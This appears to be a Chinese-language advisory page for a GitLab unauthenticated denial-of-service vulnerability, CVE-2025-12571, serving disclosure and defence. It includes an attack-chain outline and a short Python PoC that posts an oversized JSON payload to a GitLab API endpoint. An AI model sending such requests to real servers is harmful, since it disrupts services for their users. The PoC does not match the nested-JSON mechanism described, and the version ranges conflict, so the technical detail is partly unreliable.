CVE-2025-12571 CVSS 7.5 高危

CVE-2025-12571: GitLab未授权拒绝服务漏洞

披露日期: 2025-11-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12571

漏洞类型

拒绝服务 (DoS)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GitLab CE/EE

漏洞概述

GitLab CE/EE 17.10至18.6.1版本中存在安全漏洞，未经身份验证的远程攻击者可通过发送特制的恶意JSON请求触发服务器资源耗尽，导致服务不可用。该漏洞影响所有版本从17.10到18.6.1，需要立即更新至安全版本。

技术细节

攻击者利用GitLab的JSON解析模块，通过构造包含深层嵌套或超大容量的JSON负载的HTTP请求，快速消耗服务器CPU和内存资源。GitLab的输入验证不足，允许未经认证的请求触发高开销的JSON处理操作。

攻击链分析

STEP 1

攻击者识别运行易受攻击版本GitLab的目标服务器

STEP 2

构造包含恶意JSON负载的HTTP POST请求

STEP 3

发送请求到GitLab API端点

STEP 4

服务器解析恶意JSON，触发资源耗尽

STEP 5

服务不可用，拒绝正常用户访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

target = 'https://vulnerable-gitlab-instance.com'
payload = json.dumps({'data': 'x' * 100000})

response = requests.post(
    f'{target}/api/v4/projects',
    headers={'Content-Type': 'application/json'},
    data=payload
)
print(f'Status: {response.status_code}')

影响范围

GitLab CE/EE 17.10

GitLab CE/EE 18.4.5之前

GitLab CE/EE 18.5.3之前

GitLab CE/EE 18.6.1之前

防御指南

临时缓解措施

如果无法立即升级，可通过Web应用防火墙限制大型JSON请求，或禁用未认证API访问

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表